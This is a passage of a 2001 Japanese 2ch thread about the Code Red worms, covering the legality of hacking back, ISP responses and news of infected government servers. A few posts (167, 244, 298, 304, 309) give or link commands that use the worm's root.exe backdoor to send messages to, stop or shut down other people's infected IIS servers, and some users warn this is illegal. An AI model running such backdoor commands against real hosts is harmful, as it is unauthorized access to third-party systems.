刑法 第百七十七条
(強姦)
暴行又は脅迫を用いて十三歳以上の女子を姦淫した者は、強姦の罪とし、
二年以上の有期懲役に処する。十三歳未満の女子を姦淫した者も、同様とする。

153 :150:2001/08/15(水) 20:17
>>152
そっちか

154 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:17
>>149
「生命」しか読めないのか?その後ろになんて書いてある?
自由や財産も適用対象だ。

155 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:17
>>150
 あるいは、検索ロボットが、とか。
 過去ログにもそんな話があったな。

156 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:24
>>151
法律は、事象(行為によって生じた被害や事件)が発生した場所の法が適用される。
銃で国境の向こうに居る人間を射殺すれば、射殺された人の居る国の法律で裁かれる。
鯖の被害でも同じ。鯖のある国の法律に従う。
2chは外国にあるが2chの書き込みで誰かが被害を受けたらその人の居る国の法律で裁かれる。

容疑者の逮捕手段は容疑者の居る国の法律に従う。
容疑者の引渡しは各二国間の取り決めがある(らしい)。

157 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:24
>>154
日本語苦手だ。

158 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:29
容疑者が日本国内に居るなら令状無しには逮捕できないね。
現行犯じゃなければ。

159 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:33
加害者はkrにいて、鯖がusにあって、鯖の持ち主は日本人だけど、
twに10年くらい出張中で損害を被ったら?

160 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:37
>>159
鯖の破壊そのものの罪はusの法で、それによって生じた損害はtwでない?

161 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:38
>>156
犯人引渡し条約はアメリカとの間でしか結んでいなかったような・・・
間違ってたらごめん。
んで、確か懲役1年以下の罪に関しては条件を満たさないということで
引渡しはできなかったと思う。不正アクセス禁止法は1年以下の懲役じゃ
なかったっけ?

アメリカのネットゲームでIDぱくった日本人が、インターポールからの
通報を受けて日本で日本の警察に逮捕されたけど、そういう絡みもあって
「日本で捕まえてくれ」ってなったのかな?

162 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:40
しかし韓国にも「サーバをクラックする罪」がある(らしい)から、
告発すれば韓国国内でも刑事事件になるのでは?

163 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:44
つまりroot.exeでdel+"*.*"だと有罪でdir+"c:\"は無罪?
はっきりしてくれ。困るじゃないか。

164 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:50
>>157
何語が得意なの?

165 :え〜ん:2001/08/15(水) 20:52
ただいま〜

166 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:53
風呂上りのビール(゚д゚)ウマー

167 :名無しさん@お腹いっぱい。:2001/08/15(水) 20:57
例えばさ、アタック来たIPにいきなりバックドア経由のnet send * "感染してる
ぞゴルァ!" (実際これはうまく動くぞ)ってのは、相手に何ら損害を与えてない
よね。いきなりPopup出るから精神的にショック与えるかもしれんが。こちらも
相手のサーバーの内容を一切見てもいなければファイルコピーや勝手にディレク
トリー作った訳でもない。ここまではイケるんでないかとは思うんだが。Perl
あたりで簡単に作れそう。

168 :名無しさん@お腹いっぱい。:2001/08/15(水) 21:04
個人的には支持したいけど、結果、どうなるかは
結局、やってみないとわからない。
お巡りさんに相談してみよう。

169 :名無しさん@お腹いっぱい。:2001/08/15(水) 21:07
HTTP 403.9 - アクセスは許可されていません: 多数のユーザーが接続中です。
インターネット インフォメーション サービス

170 :名無しさん@お腹いっぱい。:2001/08/15(水) 21:08
やれ。ただし条件。

あんたが「やむを得ず」やろうとしている事の影響
 < あんたがそいつから受けた損害

「やむを得ず」に注意してね。

171 :名無しさん@お腹いっぱい。:2001/08/15(水) 21:49
codered.com
$19500
で売りに出てます。

172 :名無しさん@お腹いっぱい。:2001/08/15(水) 21:49
>>171
Code Red特需だな(w

173 :名無しさん@お腹いっぱい。:2001/08/15(水) 22:09
容疑者を起訴して有罪にできるかどうかは別にして、そいつをパクる
かどうかは警察の判断。法廷闘争で戦えそうな根拠があるとしても、
だからパクられないとは言えないよな。とりあえず捕まえやすい奴を
パクっておいたほうが、見せしめの効果があるとか判断して
もおかしくない。新左翼の連中なんか駐車違反で家宅捜索されてるしな。

174 :名無しさん@お腹いっぱい。:2001/08/15(水) 22:21
まあ、
あと立証責任がどっちにあると判断されるかだ。
とりあえず、(やむを得ず)を立証する責任は負
わされるだろうな。

他の手段があるような場合はだめよ。

175 :名無しさん@お腹いっぱい。:2001/08/15(水) 22:23
見せしめはやるだろうね、それもマスコミが取り上げやすいようなのを。

176 :名無しさん@お腹いっぱい。:2001/08/15(水) 22:34
「ちょっとまってよー。
法律的には問題あるかもしれないけど、悪いことしようってんじゃないでしょ。」

と書いてこれが無責任な発言であることに気が付いた。
インターネットって難しいね…

177 :名無しさん@お腹いっぱい。:2001/08/15(水) 22:45
Code Redの正体はこいつらだ。
http://www.geocities.com/SunsetStrip/Stage/7717/

178 :名無しさん@お腹いっぱい。:2001/08/15(水) 22:47
悪意が無ければ許されるのではガキの理屈と同じ。

179 :名無しさん@お腹いっぱい。:2001/08/15(水) 22:52
ま、不正アクセス禁止法は親告罪だから、管理者次第なんだろうが

180 :え〜ん:2001/08/15(水) 22:52
法曹ねたでなんかできないかな〜
う〜ん
今日はうぷおしまい

181 :名無しさん@お腹いっぱい。:2001/08/15(水) 23:03
え〜ん氏そういえば放送局との話進んでるんですか?

182 :名無しさん@お腹いっぱい。:2001/08/15(水) 23:05
>>180
あの背景はなんですか?ゲイツくんはわかりますが

183 :吉川洋太郎(仮名):2001/08/15(水) 23:16
まだやってんの?
早く寝たら?

184 :名無しさん@お腹いっぱい。:2001/08/15(水) 23:19
今日の攻撃、2/3以上日本のホスト。お盆休みから帰っていきなり感染してる
恥ずい奴ら多数と思われ。国辱である。zaqとalpha多数。

185 :え〜ん:2001/08/15(水) 23:27
>>181
マターリと

>>182
コードレッドから見たW2K(ゲイツ)の穴

186 :名無しさん@お腹いっぱい。:2001/08/15(水) 23:29
プライベートIPなのに今日のログ見たら新たな感染者のIPやDNS名が出て来る出て来るハァ

187 :名無しさん@お腹いっぱい。:2001/08/16(木) 00:05
CATV局から感染者はモデム止めちゃいますんで了承(1秒)して下さいねってメールきたyo
個人的にCATV局(皆から非難囂々なの)を応援してるんで、がんばって欲しいです

188 :名無しさん@お腹いっぱい。:2001/08/16(木) 00:20
>>187
うちのCATVは、プロバイダの運営するサー
バが感染している。しかもお盆休みで放置。
通告しても応答なし。

危機意識をもって対応しているだけマシだよ。

189 :名無しさん@お腹いっぱい。:2001/08/16(木) 00:26
>>188
それ酷いなぁ。
IP晒さなくて良いから、どこのCATVですか。

190 :188:2001/08/16(木) 00:33
>>189
横浜のし〜ぷるねっと

191 :名無しさん@お腹いっぱい。:2001/08/16(木) 00:47
>>190
し〜ぷるが感染してるんだ。
うちもし〜ぷるの範囲内だけど、集合住宅だから加入できなかったという苦い経験あり。

192 :186:2001/08/16(木) 00:53
個人的にはCATV側の対策が遅れているのはまだ許せるレベルです
それよりも許せないのがCATVに裏口を作って運用していた
http://www.keepoint.com/defaultj.asp
のような会社(それも絶対に感染してはならないような事業内容)
域内には2台以上のサーバー立ててやがった
今はモデムが止められたようなので域内の総アタック数は減ったけど根絶は出来ていない

193 :名無しさん@お腹いっぱい。:2001/08/16(木) 00:54
15日のXXXは148匹で最低記録更新
明日からどうなるかが気になるところ。

194 :名無しさん@お腹いっぱい。:2001/08/16(木) 01:06
盆の間放置されてるのんきなプロバを晒すスレでもすくリマ消化

195 :名無しさん@お腹いっぱい。:2001/08/16(木) 01:24
本当にいつなくなるんだろう

196 :名無しさん@お腹いっぱい。:2001/08/16(木) 01:27
しかし、帯域共有のCATVでやられると痛いねぇ。

197 :みんなでこれを:2001/08/16(木) 01:42
こういうのを待っていた?
http://www.treachery.net/~jdyson/earlybird/

Early Bird 赤虫を食い尽くす早起き鳥

Apacheで動いているシステムに、特製default.idaを
食わせておくと、自動的に引っかかってきたCodeRed
発信者のWebmaster, Postmasterに警告メールを出す。

まあ、警告メールでつぶせるようなら苦労しないかな?

198 :名無しさん@お腹いっぱい。:2001/08/16(木) 02:11
一件あたりに一通出したりするとspam発生ソフトになっちゃうね。

199 :18:2001/08/16(木) 03:41
やっぱりAAAAAAはチェッカーだった。
チェッカーならバックドア叩いていいのか?

200 :名無しさん@お腹いっぱい。:2001/08/16(木) 03:45
自分の管理するマシンならかまわないんじゃないかな。
自分の以外にやるのは悪用だよなあ。

201 :名無しさん@お腹いっぱい。:2001/08/16(木) 05:29
200!

202 :え〜ん:2001/08/16(木) 08:22
おはようあげ

203 :え〜ん:2001/08/16(木) 09:26
Googleなんでカンコックになってるの?
いつもと違うと思ってジーっと見たけど

204 :名無しさん@お腹いっぱい。:2001/08/16(木) 09:41
日本から解放された記念日だから。
タイトル絵をクリックすると韓国の祝日の一覧の検索にいく。
http://www.google.com/holidaylogos.html

205 :名無しさん@お腹いっぱい。:2001/08/16(木) 09:44
七五三がちょっと楽しみになったね。

206 :名無しさん@お腹いっぱい。:2001/08/16(木) 09:49
google、こんなんもあった。
http://images.google.com/images?q=red+code&btnG=Google+Search

207 :え〜ん:2001/08/16(木) 10:00
>>204
教えてくれてサンクス

思わずキャプチャーしちゃったんだけど
すてよ

208 :名無しさん@お腹いっぱい。:2001/08/16(木) 10:12
MS Hotmail (NETBLK-HOTMAIL)やMSN (NETBLK-MSN-BLK)から
攻撃されてるみたいなんですけど、コピーしたOSつかってるからかな?

209 :名無しさん@お腹いっぱい。:2001/08/16(木) 10:34
>>208
攻撃って、CodeRedII?
だよなぁ、その板なんだし。まだ直してないのかM$・・(泣藁

210 :名無しさん@お腹いっぱい。:2001/08/16(木) 11:26
自転車に乗れるようになりました!!

211 :名無しさん@お腹いっぱい。:2001/08/16(木) 12:56
CR-IIの乱数にはクセがあるみたい。
203.162.12.??? つーベトナムのホストから一時間に一回ぐらい来る。
昨夜ドメインのWebmasterにメール送ったけどまだ続いてる。
政府高官のPCで誰も手出しできないとか…(鬱
下っ端なら騒乱罪で死刑かも…(藁

212 :今日の読売の一面:2001/08/16(木) 13:25
コードレッド 個人も感染
「このウイルスはマイクロソフト製のホームページ発信用ソフトを組み込んだ
 パソコンに感染。・・・転送速度を落とす・・・」

てあったけど、HP発信用ソフトって何? HP作ってない人は持ってないってことですか?

213 :名無しさん@お腹いっぱい。:2001/08/16(木) 13:25
・・・・・・・・・・・・・。
http://messages.yahoo.co.jp/bbs?.mm=CP&action=m&board=1835584&tid=a5qa5bdkbdava5a6a5a4a5ka59&sid=1835584&mid=1

214 :名無しさん@お腹いっぱい。:2001/08/16(木) 13:32
>>213 サンクス

げ! IEに感染してるじゃん。こわ

215 :213:2001/08/16(木) 13:33
まさかIISデフォでプリインストールされてるメーカーでもあるんかねー。

216 :名無しさん@お腹いっぱい。:2001/08/16(木) 13:35
HP発信用ソフト=ブラウザ のことだったのねん! 閲覧用ならわかったのにな・・

217 :名無しさん@お腹いっぱい。:2001/08/16(木) 13:38
ん?IISのことじゃないの?

218 :名無しさん@お腹いっぱい。:2001/08/16(木) 13:38
それはないだろーと言いたいけどね

219 :213:2001/08/16(木) 13:43
今後の展開次第ではっきりすると思うがハンドル登録が今日なんでネタなのかもしれん。スマソ。

220 :名無しさん@お腹いっぱい。:2001/08/16(木) 13:51
>>213
これCodeRedか?
MXでもやってんじゃネーノ?

221 :名無しさん@お腹いっぱい。:2001/08/16(木) 13:56
>>212
>>214
>>216
本気で言ってマスカ?

222 :213:2001/08/16(木) 13:58
今考えてみたらその他のウィルスも考えられるね。重ね重ねスマソ。

223 :名無しさん@お腹いっぱい。:2001/08/16(木) 14:42
中身無しが多くなったと思ったら
プロバイダがフィルターをつけたってよ
IP記録してるって

224 :名無しさん@お腹いっぱい。:2001/08/16(木) 14:56
どこのプロバイダ?

225 :名無しさん@お腹いっぱい。:2001/08/16(木) 15:14
なんだなんだ。
夏だから? ネタ? もしくは、やぷーからのお客さま?

226 :名無しさん@お腹いっぱい。:2001/08/16(木) 15:21
>>225
具体的にどれが?

227 :名無しさん@お腹いっぱい。:2001/08/16(木) 15:31
CodeRedバスターが完成したらしいゾ!
http://www.interlink.or.jp/notification/backno/2001/info015.html

228 :名無しさん@お腹いっぱい。:2001/08/16(木) 15:36
このコードレッドパスタってinterlinkの加入者のIPに対して
有効ってこと?

229 :名無しさん@お腹いっぱい。:2001/08/16(木) 15:45
>>227
 何か、ウイルスとワームの区別がついていないような事が
 書いてあるねえ。ワームだとネームバリューがないので
 あえてウイルスと書いたんだろうか。

230 :名無しさん@お腹いっぱい。:2001/08/16(木) 15:47
>>223 さんはInterlinkかな?

231 :名無しさん@お腹いっぱい。:2001/08/16(木) 16:16
>>226 スマソ >>221さんへのレスれす

232 :名無しさん@お腹いっぱい。:2001/08/16(木) 16:22
「コード・レッド」感染、個人にも拡大
http://www.yomiuri.co.jp/04/20010816i101.htm
しっかり対象製品名を示さないとなんの意味もないよ。報道しない方がマシ。

233 :名無しさん@お腹いっぱい。:2001/08/16(木) 16:34
Name: ppp010.mal.jp.rim.or.jp
Address: 202.247.157.137

        

234 :名無しさん@お腹いっぱい。:2001/08/16(木) 16:58
>>232 ワラタ
ウイルス対策会社「シマンテック」(東京都渋谷区)の星沢裕二マネジャーは
「個人もお金をかけて企業に近い安全対策を取らないと、社会の損害はますます
広がる」と警告している。

ノートン大売れ、株あがるか?

235 :名無しさん@お腹いっぱい。:2001/08/16(木) 17:01
>>234
CR-IIはシマンテックのやらせだったりして・・・

236 :名無しさん@お腹いっぱい。:2001/08/16(木) 17:08
シマンテックの販売促進部のなかにプロジェクトCRなんてのが
あったりして・・・

237 :名無しさん@お腹いっぱい。:2001/08/16(木) 17:13
ソイレント・グリーンって知ってる?

238 :名無しさん@お腹いっぱい。:2001/08/16(木) 18:10
http://www.yomiuri.co.jp/04/20010816i311.htm
この件についての情報はきっちり公開してくれるんだろうか

239 :名無しさん@お腹いっぱい。:2001/08/16(木) 18:57
その昔パソコンゲームのフロッピープロテクト屋さんがありました。
ゲームメーカに対しては、プロテクトを掛けるお仕事。
秋葉原では、ファイラーとしてそのプロテクトをはずす商品を売っていました。

今ではシマンテックさんが同じ事をしていると思います。

>>237
ううう ストーリが思い出せない。

240 :名無しさん@お腹いっぱい:2001/08/16(木) 19:14
人肉食べるやつだよね。
スマン。それしか覚えていない。

241 :名無しさん@お腹いっぱい。:2001/08/16(木) 19:18
2001 年 8 月 15 日 IIS 用の累積的な修正プログラム (MS01-044)
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-044

242 :名無しさん@お腹いっぱい。:2001/08/16(木) 20:14

ウィルスという安易な表現が隠しているもの

http://www.hotwired.co.jp/bitliteracy/iwatani/010123/

243 :名無しさん:2001/08/16(木) 20:16
文科省コンピューターにウイルス侵入痕、サーバー休止
http://www.yomiuri.co.jp/04/20010816i311.htm

 インターネットを通じて行政文書のリストなどを検索できる文部科学省の情報公開用サーバーで16日、コンピューターウイルスの侵入を受けた痕跡が見つかった。
外部からデータを不正に改変するための“道具”が埋め込まれており、同省は「このサーバーを足掛かりにして、省内の別のコンピューターなどに侵入される恐れがある」として、
同サーバーを休止し、被害状況を調べている。

 公開されているリストは本来、インターネットから接続した利用者は閲覧するだけで、内容を変えることはできない。
ところが、改変を可能にする“道具”が、サーバーのシステムにいつの間にか組み込まれていた。
同省は、世界で猛威を振るっているコンピューターウイルスの「コード・レッド」が侵入して残した痕跡ではないかとみている。

 同サーバーは今年4月、情報公開法の施行に伴って稼働したが、蓄えられたデータ自体には今のところ、
改変などの被害が見当たらず、同省は「かなり以前に侵入されたのに、今まで気付かず、何者かが省内の他のコンピューターへ不正接続する足掛かりとして悪用した可能性もある」として、過去の接続記録などを調べている。

(8月16日17:42)

244 :名無しさん@ひとつさらせば自分をさらす:2001/08/16(木) 20:25
「ばっくどあ」全開でサービスしてる人への警告メッセージ考えてみました。

net send * "あンた、背中が煤(すす)けてるぜ (c)能條純一"

245 :名無しさん:2001/08/16(木) 20:37
関西電力のeonet.ne.jpって所からアタック来たのでIPアドレスと
アタック日時を連絡したら、
> 誠に恐れ入りますが、頂いたご質問の趣旨を
> 十分に汲み取る事ができませんでした。
> 誠に申し訳ございません。
> 特にどのような状況でどういった攻撃を受けられたのか
> などをお知らせくださいますようお願い申し上げます。
今時CodeRedIIによるアタックが理解できんとは、なかなか"ほのぼの"
とした業者のようだ。関西に住んでれば入会してみたかったところだ。

246 :名無しさん@お腹いっぱい。:2001/08/16(木) 20:51

あぶないリンゴのお話。
http://www.disney.co.jp/cybernetiquette/netiquette2/index.html

247 :名無しさん@お腹いっぱい。:2001/08/16(木) 20:52
>>245
とぼけてるんだよ。

248 :名無しさん@お腹いっぱい。:2001/08/16(木) 20:56
今、NHKで文部省のコードレッド関連のニュースやってた。
コードレッドのことを「赤い暗号」だとさ。
しかも言いよどんで、「あっかいあんごう」って。
ネタ?

249 :名無しさん@お腹いっぱい。:2001/08/16(木) 20:59
アッガイ暗号。

250 :245:2001/08/16(木) 21:05
>>247
そっか、「突っ込み」やって欲しかったのか。サポート部隊がとっさにそういう
応答できるとはさすが"関西"電力...俺も修行が足らんな。スマソ>eonet

251 :え〜ん:2001/08/16(木) 21:10
今日お通夜ができて今帰ったヨ

>>246
全部見てしまった・・勉強にナタヨ

252 :名無しさん@お腹いっぱい。:2001/08/16(木) 21:11
今日、InfoSphereから会員向けにメールが出たけど。

>□ 対策・予防方法
>マイクロソフト社のIISサーバを使用している場合、まず自サイトがCode Red/Code
>Red IIに感染していないかどうかのチェックを速やかに行ってください。
>株式会社シマンテック(感染チェック用サイト)→
> http://www.symantec.com/region/jp/securitycheck/codered_secutitycheck.html
>また、このワームの侵入を防ぐために最新のパッチを適用することを強くお勧めします。

「パッチを適用することを強くお勧めします。」って、
あてねーと、すぐに再感染しちまうのに。"お勧め"はネーダロ。

253 :名無しさん@お腹いっぱい。:2001/08/16(木) 21:12
>>248
あかいアンコウ?

254 :名無しさん@お腹いっぱい。:2001/08/16(木) 21:14
>>245
eoっていうと、無線のやつだっけ。
無線で鯖建ててるとは。カコイイ。

>>251
うちのご近所さんもお通夜だったみたいだが。

255 :名無しさん@お腹いっぱい。:2001/08/16(木) 21:26
今日はオレの通夜だ。

256 :名無しさん@お腹いっぱい。:2001/08/16(木) 21:50
え〜ん氏またUPしてるし
あれは強烈じゃない?

257 :名無しさん@お腹いっぱい。:2001/08/16(木) 22:04
いくら色調補正してあるとはいえ・・・ねえ

258 :名無しさん@お腹いっぱい。:2001/08/16(木) 22:07
symantac
だからネタ?

259 :名無しさん@お腹いっぱい。:2001/08/16(木) 22:10
>>258
シマンタック (ワラタ

260 :213:2001/08/16(木) 22:13
>>213
root.exeがあったそうでやんす

261 :え〜ん:2001/08/16(木) 22:16
>>257
そのまま載せる度胸ありまへん

262 :え〜ん:2001/08/16(木) 22:27
>>254
そうそう、そこででかい態度だったの漏れ

263 :名無しさん@お腹いっぱい。:2001/08/16(木) 22:31
>>213
怖いな、こんなガキまでIIS使っているのか。sage

264 :名無しさん@お腹いっぱい。:2001/08/16(木) 22:43
>>260
たぶん「¥感染してます」ってフォルダー作って
自慢したかったんじゃない?

265 :213:2001/08/16(木) 22:53
>>264
回答者の
http://profiles.yahoo.co.jp/Secure1993/?.src=prf&.done=http%3a//messages.yahoo.co.jp/bbs%3f.mm=CP%26action=m%26board=1835584%26tid=a5qa5bdkbdava5a6a5a4a5ka59%26sid=1835584%26mid=2&lg=jp
にも随分楽しませてもらいました
今日はぐっすり眠れそうです

266 :え〜ん:2001/08/16(木) 23:05
今日はもう寝る

みんなおやすみ

267 :ウタダヒカル:2001/08/16(木) 23:05
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067

ツールアップデートしてました。

Ver1.40 → 1.80 の修正点:
・メモリ検索精度の向上:
 メモリ中の「CODERED.C」の検索精度がアップしました。

・IIS設定削除の追加:
 改変されたIISの仮想ディレクトリを削除するように処理を追加

・検索オプションの追加
 レジストリのチェックのみを行う「/R」オプションを追加。

だそうです。

268 :223:2001/08/17(金) 00:17
例の『コードレッドバスター』なんだけど
数はすくなくなって、中身無しってのが多くなってはいるけど
時々、フィルタすり抜けてくる可愛いヤツがいるんだよ
なかなか可愛いヤツよ

269 :名無しさん@お腹いっぱい。:2001/08/17(金) 00:30
16日のご来場
NNN様、118匹
XXX様  0匹
正直な話ちょっと寂しい・・・
完全な減少傾向です。

ところで赤虫とは直接関係ないと思うけど、ログを詳しく眺めて
たらこんなのがあった
210.111.*.* - - [12/Aug/2001:22:37:26 +0900] "GET /NULL.printer" 404 -
これってなんかのアタックかな?どっかでIISのプリント関係のセキュリティー
ホール情報を見た気がするんだけど見つからない。

270 :名無しさん@お腹いっぱい。:2001/08/17(金) 00:47
私がノートンやトレンドマイクロの人間だったら
自分でウィルスを作って、自分で駆除用ワクチンをつくります。
おそらくこれと同じことをすでにやっているでしょう。

271 :名無しさん@お腹いっぱい。:2001/08/17(金) 00:55
電波な話はやめれ
今まで捕まった犯人がカワイソウや

272 :名無しさん@お腹いっぱい。:2001/08/17(金) 01:25
あったまわりー
てめーでつくんのかよ。
>>270

273 :名無しさん@お腹いっぱい。 :2001/08/17(金) 01:27
既出?

マイクロソフトがセキュリティー・ソフトを発売
http://japan.cnet.com/News/2001/Item/010215-2.html?rn

---------------
まさに盗人に追い銭

274 :名無しさん@お腹いっぱい。:2001/08/17(金) 01:38
可哀想なインターリンクユーザーのスレ

Interlink(Zoot)さんいいかげんにしてください。
http://salami.2ch.net/test/read.cgi?bbs=isp&key=997883622

275 :名無しさん@お腹いっぱい。:2001/08/17(金) 02:49
>>273
それは、昔から有るMS-Proxy Serverの新バージョンだよ・・・
串デスネン。

276 :名無しさん@お腹いっぱい。:2001/08/17(金) 06:18
文科省サーバーに「コード・レッド2」が感染の恐れ
http://news.yahoo.co.jp/headlines/mai/010817/dom/06000000_maidomm094.html

277 :名無しさん@お腹いっぱい。:2001/08/17(金) 06:32
>>127
わかってるよ、馬鹿。

278 :名無しさん@お腹いっぱい。:2001/08/17(金) 07:44
>>273
MSのことだからそれ自体にセキュリティホールがありそう。

279 :名無しさん@お腹いっぱい。:2001/08/17(金) 10:01
文科省を踏み台に米国防総省を攻撃なんてなってたら
カコワルイね

280 :名無しさん@お腹いっぱい。:2001/08/17(金) 11:40
しかし1日50件ほどの閲覧って、チョトサビシイ >文部省

281 :ppp:2001/08/17(金) 11:54
>>270
アースやら大正製薬がゴキブリばらまいてるのと同じやね

282 :名無しさん@お腹いっぱい。:2001/08/17(金) 12:14
>>281
なはは…キョーレツな喩えなるもナトク。
とはいえ漏れ個人的にはセマン信じてるが、以下の構図は暗黙としてありかな
1: げーつんとこ、のーとんさんに義理を通してヘボいOSタレ流す
2: のーとんさんとこ、せっせとソレにつぎ当てる
3: 双方丸く収まる。わははわはは
4: ユーザー、イカゲンニシロヨと泣く。

283 :名無しさん@お腹いっぱい。:2001/08/17(金) 13:00
>>282
アナタ ニホンゴ ヘンデスヨ

284 :名無しさん@お腹いっぱい。:2001/08/17(金) 13:04
話題としては面白くない事もないんだけどね、
最近、蚊が3月から11月まで活動するようになったのは
某製薬会社の研究所によって開発された改良型の蚊が
ばらまかれているからだ、なんてね。

でも、根拠がないわけだから、いわゆる妄想だよね。

285 :名無しさん@お腹いっぱい。:2001/08/17(金) 13:24
今回の事は既知のセキュリティホールだったからこんな規模で済んでいる。
もし未知の穴だったら? と想像するだけで恐い。
ところで、最近は、セキュリティ関係の会社がOSのベンダー企業と
連絡を取っていて、パッチが配布されてからしばらく後に
穴の情報が公開されるという順序になっている。
しかしこれが事前に漏れる事は無いとは言えない。もちろん、仮定の話ですが。

286 :名無しさん@お腹いっぱい。:2001/08/17(金) 14:06
未知の穴って、しばらく眠らせるんでしょ。クラッカーの持ちネタとして。
んで、手製バックドアしこたましこんでおいて、頃合いを見て発表していく。

287 :なんにせよ:2001/08/17(金) 14:29
国土交通省 下館の感染止まりました。しかし、メールフッタに俺の
Server書いてたもんだから、毎日見に来てるなぁ、、掲示板くらい何か書いてくれるとありがたいんだけど。毎日覗かれてるよ。

288 :名無しさん@お腹いっぱい。:2001/08/17(金) 15:33
.printerにも何かセキュリティーホールがあるのかな。
たまに混ざってる。

289 :名無しさん@お腹いっぱい。:2001/08/17(金) 15:49
http://news.yahoo.co.jp/headlines/mai/010817/dom/06000000_maidomm094.html
文部省のサーバーが感染したみたいだけど、点検したときにパッチを当てなかったのかな?
もし、そうだとしたら、文部省のサーバー管理の人間ってアホだね。

290 :名無しさん@お腹いっぱい。:2001/08/17(金) 15:50
>>278
まさにそのとおりになったよ。MS01-045 が出た。

291 :名無しさん@お腹いっぱい。:2001/08/17(金) 15:53
>>289
点検なんてしてねーよ。
責任逃れだって。
保守管理なんて、全くしてなかったんだよ。たぶんな。
点検してれば、パッチ当てるに決まってるだろ。
そいつ、首にしたほうがいいぜ。

292 :名無しさん@お腹いっぱい。:2001/08/17(金) 16:42
点検ってホコリを取ることだよね

293 :ふふふ:2001/08/17(金) 16:44
MSのHotmailサーバーもやられたらしいけど、ほんと?

管理はMSでやってないのかな〜

294 :名無しさん@お腹いっぱい。:2001/08/17(金) 17:14
新たな動きは有りません。
以上、現場からお伝えしました。

295 :名無しさん@お腹いっぱい。 :2001/08/17(金) 17:50
 同省情報化推進室によると、同日正午ごろ、利用者から「サーバーに異常がある」と通報があり、職員がサーバーシステムの中にコード・レッド2が侵入しているのを確認した。
日本も韓国と対して変わらないな。
はずかしいよ・・、ほんとに。

296 :(@´ー`)┌ ┌ :2001/08/17(金) 18:50
e-japanだよね〜
http://www.kantei.go.jp/jp/it/network/dai1/0122summary_j.html
ダサっ

297 :てればいだー:2001/08/17(金) 18:58

今週のテレバイだーは「ウィルス」特集
http://www.mxtv.co.jp/bangumi/variety/televaida/

298 :名無しさん:2001/08/17(金) 20:00
某MLネタなので既に知ってる人もいると思うけど、
CodeRedアクセスしてきた相手のバックドアを付いて
シャットダウンさせるCGIスクリプトだって。
http://ns1.prometheusmedia.com/default.ida

299 :名無しさん@お腹いっぱい。:2001/08/17(金) 20:34
>>298
これをperl入れたマシンに default.ida とリネームして置いておけば
いいわけね?


300 :名無しさん@お腹いっぱい。:2001/08/17(金) 20:40
default.ida??ZZZ
したマシンはどうなる?
shutdownって shutdown -h nowみたいな感じ?
そうだったら
それはそれで逆にまずくないかよ?
おもしろそうだけどな(w

301 :名無しさん@お腹いっぱい。:2001/08/17(金) 20:41
http://www.rbbtoday.com/news/20010817/4521.html
東めたがやっとポート開放するらしい。

302 :名無しさん:2001/08/17(金) 20:46
>>299

使うhttpdにもよると思うんだけど、cgiとして実行する
拡張子にidaを登録する必要があると思うな。

303 :名無しさん@お腹いっぱい。:2001/08/17(金) 20:53
>>298
根本的な原因を解決する物では無いと思う。

hotmailがさっきからエラー出すんだけど・・・Coderedがらみかな。

304 :名無しさん@お腹いっぱい。:2001/08/17(金) 20:59
手動でも落ちたぞ

http://相手のアドレス/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5

305 :名無しさん:2001/08/17(金) 22:23
zaq.ne.jpから来るCodeRedIIアタックが全然減らないんで、HTTPDのlogの
先頭部分のIP/Timestamp切り出して「何とかしてくれ」って送ったら下記の
内容が添付されとらんと対処できないと言ってきた。こんだけ騒ぎになってる
のに、今時こんな事言ってくるプロバイダ他にないぞ。
>1.攻撃された具体的な内容
>2.ポートスキャン、アタックなどであれば、そのポート番号
>3.上記の現象の発生頻度
ぐたぐたごたくぬかす前に調べんかい。ここのサポートって最低っすね。Zaq
からのアタックが減らないのも無理もない。

306 :名無しさん@お腹いっぱい。:2001/08/17(金) 22:42
>>301
何だかんだでしっかりしとるじゃないか。>東めた

307 :名無しさん@お腹いっぱい。:2001/08/17(金) 22:51
感染元サーバーをNICのwhoisで調べてメールするとUser unknown。
こういうのって腹立つやら空しいやら・・・・

308 :名無しさん@お腹いっぱい。:2001/08/17(金) 23:06
>>305
>こんだけ騒ぎになってる
>のに、今時こんな事言ってくるプロバイダ他にないぞ。
>ぐたぐたごたくぬかす前に調べんかい。ここのサポートって最低っすね。

この部分をぜひメールで言ってやってくれ
聞いてるだけでむかついてくる

309 :名無しさん:2001/08/17(金) 23:14
>>304
本当?
これやってもアクセスできるってことは落ちてないってことだよね。
うーん…… >>298 を動かした以降何件もCodeRedアクセスあるんだけど、
どこも落ちてないみたいなんだよね。

/scripts/root.exe?/c+iisreset+/stop

これってあってんのかな。手動でも効かないみたいなんだけど……

310 :名無しさん@お腹いっぱい。:2001/08/17(金) 23:19
【zaq接客マニュアル】
何かと妙な事を聞いてくる人=クレーマー
何かと同じメールを何度も送る人=クレーマー
何かと妙な引用文を添付する人=クレーマー
何かとすぐ怒る人=クレーマー
何かと「攻撃された」と言う人=クレーマー
何かと「何とかしろ」という人=クレーマー
何かと「弁償しろ」と言う人=クレーマー
何かと「責任者を出せ」という人=クレーマー
何かと「通報するぞ」と言う人=クレーマー
何かと「告訴するぞ」と言う人=クレーマー
何かと「サポート最低だな」と言う人=クレーマー

311 :名無しさん@お腹いっぱい。:2001/08/17(金) 23:24
>>309
捕まらないうちにやめておけ。

312 :名無しさん@お腹いっぱい。:2001/08/17(金) 23:24
>>304
それってWin9xにしか効かないんじゃ?
エラーダイアログ出るだけでは?

313 :名無しさん@お腹いっぱい。:2001/08/17(金) 23:28
めたりっくに対策しろメール送ったのに放置され、いつのまにかTopが変わってる。
全部なかったことにしようとしてんじゃねーだろーなあ

314 :名無しさん@お腹いっぱい。:2001/08/17(金) 23:30
わざと自分のNT系マシンからdefault.idaでアクセスしてみれば?

315 :304:2001/08/17(金) 23:30
>>312
すまん確かにデュアルブートだった

